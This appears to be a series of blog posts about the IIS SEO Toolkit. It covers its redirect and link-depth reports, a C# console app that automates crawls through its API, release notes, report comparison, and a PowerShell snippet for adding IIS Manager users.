
In the new version of the IIS SEO Toolkit we added two new reports that are very interesting, both from an SEO perspective and from a user experience and site organization perspective. These reports are located in the Links category of the reports.

Redirects

This report shows a summary of all the redirects found while crawling the Web site. The first column (Linking-URL) is the URL that was visited and resulted in a redirection to the Linked-URL (second column). The third column (Linking-Status code) specifies the type of redirection, using the names from the HTTP status code enumeration. The most common values are MovedPermanently/Moved, which is a 301, and Found/Redirect, which is a 302. The last column shows the status code of the final URL, so you can easily identify redirects that failed or that redirected to another redirect.
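The last column is what makes failing or chained redirects stand out. As a rough illustration of that idea (a sketch, not the toolkit's code), the C# below follows a redirect chain through a hypothetical in-memory crawl result, a dictionary mapping each URL to its status code and Location target, and reports every hop together with the final status, stopping on loops or overly long chains.

```csharp
using System.Collections.Generic;
using System.Net;

public static class RedirectAnalyzer
{
    // Redirect status codes that send the client to the URL in the Location header.
    public static bool IsRedirect(HttpStatusCode code) =>
        code == HttpStatusCode.MovedPermanently      // 301 (also exposed as Moved)
        || code == HttpStatusCode.Found              // 302 (also exposed as Redirect)
        || code == HttpStatusCode.SeeOther           // 303
        || code == HttpStatusCode.TemporaryRedirect; // 307

    // Follows the chain starting at 'url' through a hypothetical crawl result
    // (url -> status code and Location). Returns every URL visited and the status of
    // the last one, or null when the chain loops, is too long, or leaves the crawl data.
    public static (List<string> Hops, HttpStatusCode? FinalStatus) Follow(
        IReadOnlyDictionary<string, (HttpStatusCode Status, string Location)> crawl,
        string url, int maxHops = 10)
    {
        var hops = new List<string> { url };
        var seen = new HashSet<string> { url };
        string current = url;
        while (crawl.TryGetValue(current, out var result))
        {
            if (!IsRedirect(result.Status) || result.Location == null)
                return (hops, result.Status);   // final, non-redirect response
            if (hops.Count > maxHops || !seen.Add(result.Location))
                return (hops, null);            // redirect loop or chain too long
            hops.Add(result.Location);
            current = result.Location;
        }
        return (hops, null);                    // last hop was never crawled
    }
}
```

A chain with more than two entries is a redirect to another redirect, and a final status such as NotFound is a redirect that failed.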

image

Why should you care

This report is interesting because redirects can affect your search engine rankings and can make users perceive your site as slower, since every redirect costs the browser an extra request before it gets the actual page. For more information on redirects see: Redirects, 301, 302 and IIS SEO Toolkit.

 

Link Depth

This is probably one of my favorite reports since it is almost impossible to find this type of information in any other 'easy' way.

The report basically tells you how hard it is for users who land on your home page to get to each of the pages in your site. For example, the image below shows that it takes 5 clicks for a user to get from the home page of my site to the XGrid.htc component.

image

This is very valuable information because it tells you how deep your Web site is. In my case, if you were to walk the entire site and lay out its structure in a hierarchical diagram, it would be 5 levels deep. Remember, you want your site to be shallow so that it is easily discovered and crawled by search engines.
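Computing link depth is essentially a breadth-first search (BFS) starting at the home page: BFS reaches every page for the first time through the fewest possible clicks. The following C# sketch assumes the crawl has already been reduced to a hypothetical dictionary mapping each page to the pages it links to; it illustrates the technique and is not the toolkit's Route Query implementation.

```csharp
using System.Collections.Generic;

public static class LinkDepth
{
    // Number of clicks from 'home' to every reachable page, computed with BFS over a
    // hypothetical link graph (page -> pages it links to). Because BFS explores pages in
    // order of distance, the first time a page is reached is its minimum click count.
    public static Dictionary<string, int> Compute(
        IReadOnlyDictionary<string, string[]> links, string home)
    {
        var depth = new Dictionary<string, int> { [home] = 0 };
        var queue = new Queue<string>();
        queue.Enqueue(home);
        while (queue.Count > 0)
        {
            string page = queue.Dequeue();
            if (!links.TryGetValue(page, out var targets)) continue; // no outgoing links
            foreach (string target in targets)
            {
                if (depth.ContainsKey(target)) continue; // already reached with fewer or equal clicks
                depth[target] = depth[page] + 1;
                queue.Enqueue(target);
            }
        }
        return depth;
    }
}
```

The largest value in the returned dictionary is the depth of the whole site (5 levels in my case).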

Even more interesting, you can double-click any of the results to see the list of clicks the user has to make to get to that page.

image

Note that it shows the URL, the Title of the page, and the Text of the Link you need to click to get to the next URL (the one with a smaller index). So in my case the user needs to go to the home page and click the link with text "XGrid", which takes them to the /XGrid/ URL (index 3), where they then need to click the link with text "This is a new...", etc.
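The list of clicks can be reproduced with the same breadth-first search if each newly reached page remembers which page, and which link text, led to it; walking those pointers back from the target yields the route. The sketch below assumes a hypothetical link map in which each link carries its anchor text, and the URLs used with it are illustrative only.

```csharp
using System.Collections.Generic;

public static class Routes
{
    // Shortest click path from 'start' to 'goal' over a hypothetical link map
    // (page -> (anchor text, target) pairs). Each step is a URL plus the text of the
    // link to click next; the last step has no link text. Returns null if unreachable.
    public static List<(string Url, string LinkText)> ShortestRoute(
        IReadOnlyDictionary<string, (string Text, string Target)[]> links,
        string start, string goal)
    {
        // For every reached page, remember the page and link text that led to it.
        var cameFrom = new Dictionary<string, (string From, string Text)>();
        var visited = new HashSet<string> { start };
        var queue = new Queue<string>();
        queue.Enqueue(start);
        while (queue.Count > 0 && !visited.Contains(goal))
        {
            string page = queue.Dequeue();
            if (!links.TryGetValue(page, out var outgoing)) continue;
            foreach (var (text, target) in outgoing)
            {
                if (!visited.Add(target)) continue; // already reached by a shorter route
                cameFrom[target] = (page, text);
                queue.Enqueue(target);
            }
        }
        if (!visited.Contains(goal)) return null;

        // Walk back from the goal, then reverse to get start -> goal order.
        var route = new List<(string Url, string LinkText)> { (goal, null) };
        string current = goal;
        while (current != start)
        {
            var (from, text) = cameFrom[current];
            route.Add((from, text));
            current = from;
        }
        route.Reverse();
        return route;
    }
}
```

The result lists each URL with the text of the link to click next, mirroring the columns described above; a null result means the target cannot be reached from the start URL at all.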

As you select the URLs in the list, the link that takes you to the next URL is highlighted in the markup.

The data of this report is powered by a new type of query we called Route Query. This is interesting because you can customize the report by adding different filters, changing the start URL, and more.

For example, let's say I want to find all the pages a user can get to when they land on a specific page of my site, say http://www.carlosag.net/Tools/XGrid/editsample.htm:

In the Dashboard view of a Report, select the option 'Query->New Routes Query'. This opens a new Query tab where you can specify the Start URL you are interested in.

image

As you can see, this report clearly shows that if a user lands on this page they are basically stuck and can only reach 8 pages of the entire site. This is a clear example of where a link to the Home page would be beneficial.

 

Another common scenario for this query infrastructure is directing traffic from your most popular pages to your conversion pages: this report lets you figure out how easy or difficult it is to get from any page to your conversion pages.
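The conversion-page question is the same search run in the opposite direction: reverse every link, start the breadth-first search at the conversion page, and a single pass yields the number of clicks from every page to that target. A sketch in C#, again assuming a hypothetical dictionary from each page to the pages it links to:

```csharp
using System.Collections.Generic;

public static class ConversionDistance
{
    // Minimum number of clicks from each page to 'target', computed over a hypothetical
    // link graph (page -> pages it links to) by running BFS on the reversed graph.
    public static Dictionary<string, int> ClicksTo(
        IReadOnlyDictionary<string, string[]> links, string target)
    {
        // Reverse every link: page -> pages that link to it.
        var incoming = new Dictionary<string, List<string>>();
        foreach (var entry in links)
        {
            foreach (string to in entry.Value)
            {
                if (!incoming.TryGetValue(to, out var linkers))
                {
                    linkers = new List<string>();
                    incoming[to] = linkers;
                }
                linkers.Add(entry.Key);
            }
        }

        // BFS from the target over the reversed links.
        var distance = new Dictionary<string, int> { [target] = 0 };
        var queue = new Queue<string>();
        queue.Enqueue(target);
        while (queue.Count > 0)
        {
            string page = queue.Dequeue();
            if (!incoming.TryGetValue(page, out var sources)) continue;
            foreach (string source in sources)
            {
                if (distance.ContainsKey(source)) continue; // already has a shorter or equal distance
                distance[source] = distance[page] + 1;
                queue.Enqueue(source);
            }
        }
        // Pages missing from the result cannot reach the target by following links.
        return distance;
    }
}
```

Pages that do not appear in the returned dictionary have no route to the conversion page.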


One question that I've been asked several times is: "Is it possible to schedule the IIS SEO Toolkit to run automatically every night?". Other related questions are: "Can I automate the SEO Toolkit so that as part of my build process I'm able to catch regressions on my application?", or "Can I run it automatically after every check-in to my source control system to ensure no links are broken?", etc.

The good news is that the answer is YES! The bad news is that you have to write a bit of code to make it work. The SEO Toolkit includes a managed code API that starts the analysis just like the User Interface does, and you can call it from any managed application.

In this post I will show you how to write a simple console application that starts a new analysis against the site provided as a command-line argument and runs a few queries once it finishes.

IIS SEO Crawling APIs

The most important type included is a class called WebCrawler, which drives the entire analysis process. The following image shows this class and some of the related classes you will need.

image

The WebCrawler class is initialized with the configuration specified in a CrawlerSettings instance. It exposes two methods, Start() and Stop(): Start() begins the crawling process on a set of background threads, and Stop() stops it. The WebCrawler class also gives you access to the CrawlerReport through its Report property. The CrawlerReport class represents the results of the crawling process, whether completed or still in progress. Its GetUrls() method returns all the UrlInfo items. UrlInfo is the most important class: it represents a URL that has been downloaded and processed, and it holds all the metadata such as Title, Description, ContentLength, ContentType, and the set of Violations and Links the page includes.

Developing the Sample

  1. Start Visual Studio.
  2. Select the option "File->New Project".
  3. In the "New Project" dialog select the template "Console Application", enter the name "SEORunner" and press OK.
  4. Using the menu "Project->Add Reference" add a reference to the IIS SEO Toolkit Client assembly "c:\Program Files\Reference Assemblies\Microsoft\IIS\Microsoft.Web.Management.SEO.Client.dll".
  5. Replace the code in the file Program.cs with the code shown below.
  6. Build the solution.
using System;
using System.IO;
using System.Linq;
using System.Net;
using System.Threading;
using Microsoft.Web.Management.SEO.Crawler;

namespace SEORunner {
    class Program {

        static void Main(string[] args) {
            if (args.Length != 1) {
                Console.WriteLine("Please specify the URL.");
                return;
            }

            // Create a Uri instance from the command-line argument
            Uri startUrl = new Uri(args[0]);

            // Run the analysis
            CrawlerReport report = RunAnalysis(startUrl);

            // Run a few queries...
            LogSummary(report);

            LogStatusCodeSummary(report);

            LogBrokenLinks(report);
        }

        private static CrawlerReport RunAnalysis(Uri startUrl) {
            CrawlerSettings settings = new CrawlerSettings(startUrl);
            // Consider internal only the pages in the start URL's folder or deeper
            settings.ExternalLinkCriteria = ExternalLinkCriteria.SameFolderAndDeeper;

            // Generate a unique name (HH is the 24-hour clock, so AM and PM runs do not collide)
            settings.Name = startUrl.Host + " " + DateTime.Now.ToString("yy-MM-dd HH-mm-ss");

            // Use the same directory as the default used by the UI
            string path = Path.Combine(
                Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments),
                "IIS SEO Reports");

            settings.DirectoryCache = Path.Combine(path, settings.Name);

            // Create a new crawler and start running
            WebCrawler crawler = new WebCrawler(settings);
            crawler.Start();

            // Print progress once per second until the crawler finishes
            Console.WriteLine("Processed - Remaining - Download Size");
            while (crawler.IsRunning) {
                Thread.Sleep(1000);
                Console.WriteLine("{0,9:N0} - {1,9:N0} - {2,9:N2} MB",
                    crawler.Report.GetUrlCount(),
                    crawler.RemainingUrls,
                    crawler.BytesDownloaded / 1048576.0f);
            }

            // Save the report
            crawler.Report.Save(path);

            Console.WriteLine("Crawling complete!!!");

            return crawler.Report;
        }

        private static void LogSummary(CrawlerReport report) {
            Console.WriteLine();
            Console.WriteLine("----------------------------");
            Console.WriteLine(" Overview");
            Console.WriteLine("----------------------------");
            Console.WriteLine("Start URL:  {0}", report.Settings.StartUrl);
            Console.WriteLine("Start Time: {0}", report.Settings.StartTime);
            Console.WriteLine("End Time:   {0}", report.Settings.EndTime);
            Console.WriteLine("URLs:       {0}", report.GetUrlCount());
            Console.WriteLine("Links:      {0}", report.Settings.LinkCount);
            Console.WriteLine("Violations: {0}", report.Settings.ViolationCount);
        }

        // Lists the internal URLs that returned 404 Not Found, sorted alphabetically
        private static void LogBrokenLinks(CrawlerReport report) {
            Console.WriteLine();
            Console.WriteLine("----------------------------");
            Console.WriteLine(" Broken links");
            Console.WriteLine("----------------------------");
            foreach (var item in from url in report.GetUrls()
                                 where url.StatusCode == HttpStatusCode.NotFound &&
                                       !url.IsExternal
                                 orderby url.Url.AbsoluteUri ascending
                                 select url) {
                Console.WriteLine(item.Url.AbsoluteUri);
            }
        }

        // Counts the processed URLs per HTTP status code
        private static void LogStatusCodeSummary(CrawlerReport report) {
            Console.WriteLine();
            Console.WriteLine("----------------------------");
            Console.WriteLine(" Status Code summary");
            Console.WriteLine("----------------------------");
            foreach (var item in from url in report.GetUrls()
                                 group url by url.StatusCode into g
                                 orderby g.Key
                                 select g) {
                Console.WriteLine("{0,20} - {1,5:N0}", item.Key, item.Count());
            }
        }
    }
}

 

If you are not using Visual Studio, you can save the code above in a file named SEORunner.cs and compile it from the command line:

C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /r:"c:\Program Files\Reference Assemblies\Microsoft\IIS\Microsoft.Web.Management.SEO.Client.dll" /optimize+ SEORunner.cs

 

After that you can run SEORunner.exe, passing the URL of your site as an argument. You will see output like:

Processed - Remaining - Download Size
       56 -       149 -      0.93 MB
      127 -       160 -      2.26 MB
      185 -       108 -      3.24 MB
      228 -        72 -      4.16 MB
      254 -        48 -      4.98 MB
      277 -        36 -      5.36 MB
      295 -        52 -      6.57 MB
      323 -        25 -      7.53 MB
      340 -         9 -      8.05 MB
      358 -         1 -      8.62 MB
      362 -         0 -      8.81 MB
Crawling complete!!!

----------------------------
 Overview
----------------------------
Start URL:  http://www.carlosag.net/
Start Time: 11/16/2009 12:16:04 AM
End Time:   11/16/2009 12:16:15 AM
URLs:       362
Links:      3463
Violations: 838

----------------------------
 Status Code summary
----------------------------
                  OK -   319
    MovedPermanently -    17
               Found -    23
            NotFound -     2
 InternalServerError -     1

----------------------------
 Broken links
----------------------------
http://www.carlosag.net/downloads/ExcelSamples.zip

 

The most interesting method above is RunAnalysis. It creates a new instance of CrawlerSettings with the start URL and specifies that all the pages hosted in the same directory or its subdirectories should be considered internal. It also sets a unique name for the report and uses the same directory as the IIS SEO UI, so that IIS Manager shows the reports just as if it had generated them. It then calls Start(), which starts the number of worker threads specified in the WebCrawler.WorkerCount property, and finally waits for the WebCrawler to finish by polling the IsRunning property.

The remaining methods use LINQ to run a few queries over the results, such as a summary that aggregates all the processed URLs by status code and the list of internal URLs that returned 404 Not Found.

Summary

As you can see, the IIS SEO Toolkit crawling APIs let you write your own application that runs the analysis against your Web site, which you can integrate with the Windows Task Scheduler, your own scripts, or your build system for continuous integration.

Once the report is saved locally, you can open it in IIS Manager and continue the analysis just as with any other report. For example, you can schedule this console application with the Windows Task Scheduler so that it runs every night. Note that you could also write a few lines of PowerShell to automate this from the command line without writing C# code, but that is left for another post.
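To plug the runner into a build or a scheduled task, it helps to turn the results into a process exit code. The following is a minimal sketch under stated assumptions: it treats 4xx and 5xx responses on internal URLs as broken (in line with the toolkit flagging status codes 400-600 as broken links) and takes the crawl results as plain tuples, so it compiles without the toolkit assembly.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;

public static class BuildGate
{
    // Assumed policy: any 4xx or 5xx response counts as broken.
    public static bool IsBroken(HttpStatusCode status) =>
        (int)status >= 400 && (int)status < 600;

    // Prints internal broken URLs to stderr and returns an exit code for a build
    // script or scheduled task: 0 when clean, 1 when at least one broken link was found.
    public static int ExitCodeFor(IEnumerable<(string Url, HttpStatusCode Status, bool IsExternal)> urls)
    {
        List<string> broken = urls
            .Where(u => !u.IsExternal && IsBroken(u.Status))
            .Select(u => u.Url)
            .OrderBy(u => u, StringComparer.Ordinal)
            .ToList();
        foreach (string url in broken)
            Console.Error.WriteLine("Broken link: " + url);
        return broken.Count == 0 ? 0 : 1;
    }
}
```

In SEORunner, Main could be declared as static int Main(string[] args) and end with return BuildGate.ExitCodeFor(report.GetUrls().Select(u => (u.Url.AbsoluteUri, u.StatusCode, u.IsExternal)));. This relies on the same UrlInfo members (Url, StatusCode, IsExternal) that LogBrokenLinks already uses; a build script can then fail on any non-zero exit code.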


Today we are announcing the final release of the IIS Search Engine Optimization (SEO) Toolkit v1.0. This version builds upon the Beta 1 and Beta 2 versions and is 100% compatible with them, so any report you currently have continues to work in the new version. The new version includes a set of bug fixes and new features such as:

  1. Extensibility. In this version we are opening a new set of APIs that allow you to develop extensions for the crawling process, including the ability to augment the metadata in the report with your own, extend the set of tasks provided in the Site Analysis and Sitemaps User Interface, and more. More on this in an upcoming post.
  2. New Reports. Based on feedback we added a Redirects summary report in the Links section, as well as a new Link Depth report that lets you easily find the "most hidden pages" in your site; in other words, if a user landed on your site's home page, "how many clicks would they need to reach a particular page".
  3. New Routes Query. We added a new type of Query called Routes. This is the underlying data that powers the "Link Depth" report mentioned above; it is also exposed as a new query type so that you can create your own queries, customizing the Start page, filtering, grouping, etc.
  4. New option to opt out of keeping a local cache of files. We added a new switch in the "Advanced Settings" of the New Analysis dialog to disable keeping the files stored locally. Reports run this way are faster and consume a lot less disk space than when the files are cached. The only side effect is that you will not get the "Content" tab, the contextual position of the links, or the Word Analysis feature. Everything else continues to work just as in any other report.
  5. HTML Metadata is now stored in the Report. Leveraging the Extensibility mentioned in item 1, the HTML parser now stores the content of all the HTML META tags so that you can later use it in your own queries, whether to filter, group or just export data. This gives you a very interesting set of options if you have metadata like Author or any custom tags.
  6. Several Bug Fixes:
    1. Internal URLs linked by External URLs now are also included in the crawling process.
    2. Groupings in queries should be case sensitive
    3. Show contextual information (link position) in Routes
    4. The Duplicate detection logic should only include valid responses (do not include 404 NOT Found, 401, etc)
    5. Canonical URLs should support sub-domains.
    6. Several Accessibility fixes. (High DPI, Truncation in small resolutions, Hotkeys, Keyboard navigation, etc).
    7. Several fixes for Right-To-Left languages. (Layout and UI)
    8. Help shortcuts enabled.
    9. New Context Menus for Copying content
    10. Add link position information for Canonical URLs
    11. Remove x-javascript validation for this release
    12. Robots algorithm should be case sensitive
    13. Many more

This version can upgrade both the Beta 1 and Beta 2 versions, so go ahead and try it, and PLEASE provide us with feedback and anything else you would like to see in the next version at the SEO Forum in the IIS Web site.

Click here to install the IIS SEO Toolkit.


Yesterday I presented the session "AMS04: Boost Your Site’s Search Ranking with the IIS Search Engine Optimization Toolkit" at ASP.NET Connections. It was fun to talk to attendees who had several questions about the tool and SEO in general. It is always really interesting to learn about all the unique environments and types of applications being built and how the SEO Toolkit can help them.

Here are the IIS SEO Toolkit slides that I used.

Here you can find the IIS SEO Toolkit download.

And by far the easiest way to get it installed is using the Microsoft Web Platform Installer.

Please send any questions and feedback to the IIS SEO Toolkit Forums.

And by the way, stay tuned for the RTW version of IIS SEO Toolkit coming SOON.


One of my favorite features in the IIS Search Engine Optimization (SEO) Toolkit is what we called Report Comparison. Report Comparison allows you to compare the results of two different crawls of the same site to see what changed in between. This is a really convenient way to track not only changes in terms of SEO violations but also changes in any attribute of the pages, such as Title, Heading, Description, Links, Violations, etc.

How to access the feature

There are a couple of ways to get to this feature.

1) Use the Compare Reports task. While in the Site Analysis Reports listing, select two reports using Ctrl+Click; if both reports are compatible (e.g. they use the same Start URL), the task "Compare Reports" is shown. Clicking it gets you the comparison.

CompareReportsTask

2) Use the Compare to another report menu item. While in the Dashboard view of a Report you can use the "Report->Compare To Another Report" menu item which will show a dialog where you can either select an existing report or even start a new analysis to compare with.

CompareReportsMenu

Report Comparison Page

In both cases you will get the Report Comparison Page displaying the results as shown in the next image.

CompareResults

The Report Comparison page includes a couple of "sections" with data. At the very top it includes links showing the Name and the Date when the reports were run. Clicking them opens the report directly, just as if you had used the Site Analysis report listing view.

The next section shows a lot of interesting built-in data such as:

Total # of URLs: The total number of URLs found in each of the two versions. Clicking the link gives you the listing of URLs for the version of the report you choose.
New and Removed: The number of URLs that were added in the new version or removed from the old version.
Clicking the added link gives you the listing of URLs from the new version of the report; clicking the removed link gives you the listing from the old version.
Changed and Unchanged: The number of URLs that were modified or not modified, calculated by comparing the hashes of the files in both versions.
Clicking the links gives you a query that compares both versions of the URLs, showing their content length. (See below)
Total # of Violations: The total number of violations found in each of the two versions.
New in existing pages and Fixed in existing pages: The number of violations introduced or removed on URLs that exist in both reports.
Clicking the added link gives you the listing of violations from the new version of the report; clicking the removed link gives you the listing from the old version.
Introduced in new pages: The number of violations on URLs that are found only in the new report.
Clicking the link gives you the listing of violations from the new version of the report.
Fixed by page removal: The number of violations that disappeared because their URLs were no longer found in the new report.
Clicking the link gives you the listing of violations from the old version of the report.
Others: A number of additional reports that compare different attributes of URLs found in both reports, such as Time Taken, Content Length, Status Code and # of Links.
Clicking the links gives you the query that compares both versions of the reports, showing the relevant fields. (See below)
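The bucket definitions above translate into simple set operations over the two crawls. The C# sketch below assumes each report has been reduced to hypothetical dictionaries (URL to content hash, and URL to the set of violation names); it uses SHA-256 purely as an illustrative hash, since the algorithm the toolkit uses is not described here.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Security.Cryptography;
using System.Text;

public static class ReportDiff
{
    // Content hash used to decide Changed vs Unchanged. SHA-256 is an assumption
    // made for this sketch; it is not necessarily the hash the toolkit uses.
    public static string Hash(string content)
    {
        using (var sha = SHA256.Create())
            return BitConverter.ToString(sha.ComputeHash(Encoding.UTF8.GetBytes(content)));
    }

    // Buckets URLs from two crawls of the same site (hypothetical url -> content hash maps).
    public static (List<string> New, List<string> Removed, List<string> Changed, List<string> Unchanged)
        CompareUrls(IReadOnlyDictionary<string, string> oldReport, IReadOnlyDictionary<string, string> newReport)
    {
        var added = newReport.Keys.Where(u => !oldReport.ContainsKey(u)).ToList();
        var removed = oldReport.Keys.Where(u => !newReport.ContainsKey(u)).ToList();
        var common = newReport.Keys.Where(oldReport.ContainsKey).ToList();
        var changed = common.Where(u => oldReport[u] != newReport[u]).ToList();
        var unchanged = common.Where(u => oldReport[u] == newReport[u]).ToList();
        return (added, removed, changed, unchanged);
    }

    // Buckets violations (hypothetical url -> set of violation names) as the comparison page describes.
    public static (int NewInExistingPages, int FixedInExistingPages, int IntroducedInNewPages, int FixedByPageRemoval)
        CompareViolations(IReadOnlyDictionary<string, HashSet<string>> oldReport,
                          IReadOnlyDictionary<string, HashSet<string>> newReport)
    {
        int introducedExisting = 0, fixedExisting = 0, introducedNew = 0, fixedByRemoval = 0;
        foreach (var page in newReport)
        {
            if (oldReport.TryGetValue(page.Key, out var before))
            {
                introducedExisting += page.Value.Count(v => !before.Contains(v));
                fixedExisting += before.Count(v => !page.Value.Contains(v));
            }
            else
            {
                introducedNew += page.Value.Count;   // page exists only in the new report
            }
        }
        foreach (var page in oldReport)
            if (!newReport.ContainsKey(page.Key))
                fixedByRemoval += page.Value.Count;  // page disappeared from the new report
        return (introducedExisting, fixedExisting, introducedNew, fixedByRemoval);
    }
}
```

URLs present in both crawls are split into Changed and Unchanged by their hash, while violations on URLs that exist in only one crawl fall into the "Introduced in new pages" or "Fixed by page removal" buckets.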

Whenever you click the links you get a query dialog that you can customize just as any Query in the Query builder, where you can Add/Remove columns, add filters, etc.

My favorite one is the "Modified URLs" source, where you can actually add filters that compare fields of the URLs coming from the two different reports.

QueryDialog

Note that when you double click or "right-click –> Compare Details" any of the rows you get a side-by-side comparison of everything in the URL:

SideBySideDialog

Again, you can use any of the tabs to see side by side the Content of the pages, the Links both versions have, the violations, or pretty much anything you can see for a single report.

SideBySideDialog2

Finally, you can also right click on the Query dialog and choose "Compare Contents". This will launch whatever File Comparison tool you have configured using the "Edit Feature Settings". In this case I have configured WinDiff.exe which shows something like:

SideBySideContents

Summary

As you can see, Report Comparison is a powerful feature that allows you to keep track of changes between two different reports. This lets you understand over time how your site has been affected by changes, and lets site managers query and maintain a history of all the changes. You can imagine an automated build process that runs an IIS SEO Toolkit crawl whenever a build is made, stores the report somewhere and annotates it with the build number; you could then even correlate code changes with the results of crawling the Web site.


Next week I will be presenting at the ASP.NET Connections event in Las Vegas the following topics:

  1. AMS04: Boost Your Site’s Search Ranking with the IIS Search Engine Optimization Toolkit: Search engines are just robots, and you have to play by their rules if you want to see your site in the top search results. In this session, you will learn how to leverage the IIS Search Engine Optimizer and other tools to improve your Web site for search engine and user traffic. You will leave this session with a set of tips and tricks that will boost the search rank, performance and consistency of your Web site. Tuesday 10:00 am.
  2. AMS10: Developing and Deploying for the Windows Web App Gallery: Come hear how the Microsoft Web Platform fosters a powerful development ecosystem for Web applications, and how the latest wave of IIS extensions enable Web applications to move seamlessly from a development environment to a production datacenter. You will also learn how to package a Web application for the Windows Web App Gallery to make it available to millions of users. Thursday 8:15 am.

I will also be participating in a session called: "Q&A session with Scott Guthrie and the ASP.NET and VWD teams at DevConnections" on Wednesday.

It should be fun. If you are around, stop by the Microsoft Web Platform booth, where I will be hanging around the rest of the time trying to answer any questions and learning more about how you use IIS and any problems you might be facing.


Today somebody asked in the IIS.net Forums how they could automate the process of adding IIS Manager Users and their Permissions using a script or the command line, and I thought it would be useful to post something that is easy to find and refer to.

They had found a way to do it by editing configuration directly, however the password was not getting encrypted.

The first thing I would like to highlight is that the password is not encrypted; it is actually stored as a hash. This means that just entering the password in clear text will not work. The only way it works is if you calculate the same hash our current implementation does.

Having said that, adding the users manually is also not a good idea, since the IIS Manager functionality is extensible and its storage can be replaced to store the users in SQL Server or any other backend. Our built-in implementation stores them in Administration.config, but at any given time someone could be using a different provider, which means your code would not work either.

So what is the right way? The right way is to use the existing APIs we surface in Microsoft.Web.Management.dll, in particular Microsoft.Web.Management.Server.ManagementAuthentication and Microsoft.Web.Management.Server.ManagementAuthorization. Using these APIs ensures that the right provider is called with the correct arguments, so you do not have to implement or know any details of its implementation.

These types are really easy to consume from managed code, but that does mean you have to write code. The good news is that through PowerShell this gets as simple as it can possibly get.

Just launch PowerShell (make sure it is elevated, running as an administrator).

Here is how you add a user and grant them access to Default Web Site:

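# Load the IIS Manager management assembly ([void] suppresses the assembly details output)
[void][System.Reflection.Assembly]::LoadWithPartialName("Microsoft.Web.Management")
# Create the IIS Manager user through the configured authentication provider, which takes care of storing the password
[Microsoft.Web.Management.Server.ManagementAuthentication]::CreateUser("MyUser", "ThePassword")
# Grant the user access to Default Web Site; $FALSE indicates "MyUser" is a user name rather than a role
[Microsoft.Web.Management.Server.ManagementAuthorization]::Grant("MyUser", "Default Web Site", $FALSE)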

Yesterday we released the Beta 2 version of the IIS Search Engine Optimization (SEO) Toolkit. This version builds upon Beta 1 adding a set of new features and several bug fixes reported through the SEO forum:

  1. Report Comparison. Now you can compare two reports and track many different metrics that changed in between, such as New and Removed URLs, Changed and Unchanged URLs, Violations Fixed and new Violations introduced. You can also compare the details as well as the contents side by side to see exactly what changed, whether in markup, headers, or anywhere else. This feature will allow you to easily keep track of changes on your Web site. More on this feature in a future post.
  2. Authentication Support. Now you can crawl Web sites that have secured content through both Basic and Windows Authentication. This was required to crawl Intranet sites as well as certain staging environments that are protected by credentials.
  3. Extensibility.
    1. Developers can now extend the crawling process by providing custom modules that can parse new content types or add new violations.
    2. Developers can also provide additional set of tasks for the User Interface to expose additional features in the Site Analyzer UI as well as the Sitemaps UI.
  4. Canonical Link Support. The crawler now understands Canonical Links (rel="canonical") and contains a new set of violations to detect 5 common mistakes such as invalid use, incorrect domains, etc. The User Interface has also been extended to leverage this concept, so you can generate queries using the "Canonical URL" field, and the Sitemaps User Interface now does a better job of filtering out URLs that are not canonical. For more information on canonical links see: http://www.bing.com/community/blogs/webmaster/archive/2009/02/12/partnering-to-help-solve-duplicate-content-issues.aspx
  5. Export. There are three new menu items, "Export all Violations", "Export all URLs" and "Export all Links". They save the data in CSV (comma-separated values) format, which can easily be opened with Excel or any other spreadsheet program (or even Notepad). Log Parser is another tool you can use to run SQL queries against these files.
  6. Open Source Files and Directories. To make fixing violations easier, when you crawl content locally you now get a context menu that opens the file, or the directory that contains it, in the pre-configured editor with a single click.
  7. Usability feedback. We made many changes in the User Interface to simplify workflows and feature discovery based on the usability feedback we received.
    1. Now we have a Start Menu Program to open the feature directly (IIS Search Engine Optimization (SEO) Toolkit).
    2. New Search Engine Optimization Page. All the features, common tasks and the most recently used content are now surfaced from a single page, so that a single click gets you to what you need.
    3. Query Builder updates, better UI for aggregation, auto-suggest for some fields, and better/cleaner display in general.
    4. Automatically start common tasks as part of a workflow.
    5. Less use of Tabs. We learned users felt uncomfortable getting multiple Tabs opened such as when "drilling-down" from a Violations query to see the details. In this version the "drilling-down" happens on a popup dialog to facilitate navigation and preserve context on where you were before. We also kept the option to open them in Tabs by using the "Open Group in New Query" context menu option for those that actually liked that.
    6. Added a new Violations tab in the Details dialog to facilitate fixing violations page by page.
    7. New grouping by start time in the reports page.
    8. Many more…
  8. Many bug fixes such as Fixes for CSS parsing (Comments, URL detection, etc), URL Resolution for relative URLs, Remove noise for violations in redirects, better parsing of CSS styles inside HTML, Fixes for HTML to Text conversion, better handling of storage of cached files, fixed format for dates in sitemaps, better bi-directional rendering and Right-to-Left, etc.
  9. Flag status codes 400-600 as broken links.
  10. Robots now can open the robots.txt file and fixed a couple of processing issues.
  11. Sitemaps has better filtering and handling of canonical URLs
  12. Many more

This version can upgrade the Beta 1 version and is fully compatible with it (i.e. your reports continue to work with the new version), so go ahead and try it and PLEASE provide us with feedback at the SEO Forum in the IIS Web site.

Click here to install the IIS SEO Toolkit.


A lot of sites today let users sign in to see some sort of personalized content, whether it's a forum, a news reader, or an e-commerce application. To simplify their users' lives, they usually want to let them log on from any page of the site they are currently looking at. Similarly, to keep navigation simple, Web sites usually generate dynamic links that take users back to the page they were on before visiting the login page, something like: <a href="/login?returnUrl=/currentUrl">Sign in</a>.

If your site has a login page you should definitely consider adding it to the Robots Exclusion list, since it is a good example of the things you do not want a search engine crawler to spend its time on. Remember that crawlers spend a limited amount of time on your site, and you really want them to focus on what is important.

Out of curiosity I searched for login.php and login.aspx and found over 14 million login pages… that is a lot of useless content in a search engine.

Another big reason is that URLs like these, which vary from page to page, create hundreds of variations for crawlers to follow, like /login?returnUrl=page1.htm, /login?returnUrl=page2.htm, etc., which basically doubles the work for the crawler. Even worse, if you are not careful you can easily create an infinite loop for them by adding the same "login link" to the login page itself: you get /login?returnUrl=login as the link, following it gives /login?returnUrl=login?returnUrl=login... and so on, with an ever-changing URL for each page on your site. Note that this is not hypothetical; it is a real example from a few famous Web sites (which I will not disclose). Of course crawlers are not that silly: they will not crawl your Web site infinitely and will stop after requesting the same resource (/login) a few hundred times, but this still reduces the time they spend looking at what really matters to your users.
